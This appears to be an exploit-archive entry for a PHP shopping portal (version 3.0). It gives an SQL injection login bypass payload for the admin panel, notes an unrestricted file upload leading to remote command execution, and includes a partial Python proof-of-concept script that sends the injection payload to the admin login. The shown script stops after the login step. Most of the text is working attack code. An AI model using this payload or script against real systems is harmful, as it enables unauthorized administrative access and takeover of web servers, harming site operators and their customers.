Exploits / Vulnerability Discovered : 2020-01-01 |
Type : webapps |
Platform : php
This exploit / vulnerability Shopping portal proversion 3.0 authentication bypass is for educational purposes only and if it is used you will do on your own risk!
# Description:
# Password and username parameters have sql injection vulnerability on admin panel.
# username: joke' or '1'='1'# , password: joke' or '1'='1'#
# Also, there isn't any restriction for malicious file uploading in the "Insert Product" section.
# This two vulnerabilities occur unauthenticated remote command execution.
#!/usr/bin/python
import requests
import sys
import urllib
if (len(sys.argv) !=3) or sys.argv[1] == "-h":
print "[*] Usage: PoC.py rhost/rpath command"
print "[*] e.g.: PoC.py 127.0.0.1/shopping ipconfig"
exit(0)
rhost = sys.argv[1]
command = sys.argv[2]
url = "http://"+rhost+"/admin/index.php"
data = {"username": "joke' or '1'='1'#", "password": "joke' or '1'='1'#", "submit": ""}
with requests.Session() as session:
#login
lg = login = session.post(url, data=data, headers = {"Content-Type": "application/x-www-form-urlencoded"})
print ("[*] Status code for login: %s"%lg.status_code)
if lg.status_code != 200:
print ("One bad day! Check web application path!")
sys.exit()